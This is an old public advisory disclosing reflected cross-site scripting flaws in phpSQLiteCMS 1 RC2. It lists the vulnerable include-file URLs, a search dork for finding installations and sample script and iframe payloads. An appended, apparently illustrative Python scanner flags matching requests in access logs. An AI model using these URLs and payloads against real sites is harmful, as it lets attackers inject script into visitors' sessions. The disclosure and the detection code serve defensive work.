==========================================================
phpSQLiteCMS Multiple Remote XSS Vulnerability
==========================================================
AUTHOR: CWH Underground
DATE: 21 May 2008
SITE: www.citec.us
#####################################################
APPLICATION: phpSQLiteCMS
VERSION: 1 RC2 (Latest Version)
VENDOR: http://downloads.sourceforge.net/phpsqlitecms
#####################################################
DORK: "Powered By phpSQLiteCMS"
--- Exploit ---
[-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[home]=<XSS>
[-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu]=<XSS>
[-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu_page_overview]=<XSS>
[-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_username]=<XSS>
[-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_password]=<XSS>
Example for XSS:
<script>alert(123);</script>
<iframe src=http://www.google.com>
##################################################################
Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, Win7dos, JabAv0C
##################################################################
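
A log check for the request pattern listed under Exploit above, added here as an example (it is not part of the original advisory or of phpSQLiteCMS): it flags direct requests to the two include files that carry lang[...] parameters, including percent-encoded and double-encoded forms. The combined access-log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Include files and lang[] parameter shape named in the advisory above.
INCLUDE_RE = re.compile(r"/cms/includes/(header|login)\.inc\.php$", re.I)
LANG_KEY_RE = re.compile(r"^lang\[([^\]]*)\]$", re.I)
MARKUP_RE = re.compile(r"[<>\"']")
# Assumed log layout: Apache/nginx "combined" format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def check_line(line):
    """Return a finding dict if the line matches the advisory's pattern, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not INCLUDE_RE.search(unquote(url.path)):
        return None
    hits = []
    # parse_qsl percent-decodes keys and values, so lang%5Bhome%5D is matched too.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        k = LANG_KEY_RE.match(key)
        if k:
            # Decode once more to catch double-encoded values (%253C -> %3C -> <).
            decoded = unquote(value)
            hits.append({"key": k.group(1), "value": decoded,
                         "markup": bool(MARKUP_RE.search(decoded))})
    if not hits:
        return None
    return {"client": line.split(" ", 1)[0], "file": url.path, "params": hits}


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/May/2008:10:00:01 +0000] "GET /site/cms/includes/header.inc.php?lang%5Bhome%5D=%3Cb%3Ex HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [21/May/2008:10:00:05 +0000] "GET /site/cms/includes/login.inc.php?lang[login_username]=%253Ci%253E HTTP/1.1" 200 300 "-" "-"',
    '198.51.100.7 - - [21/May/2008:10:01:00 +0000] "GET /site/index.php?lang=en HTTP/1.1" 200 4096 "-" "-"',
    '198.51.100.8 - - [21/May/2008:10:02:00 +0000] "GET /site/cms/includes/header.inc.php HTTP/1.1" 200 128 "-" "-"',
]


def scan(lines):
    return [f for f in map(check_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any hit is worth reviewing even when "markup" is false, since none of the listed requests targets a page meant to be loaded directly.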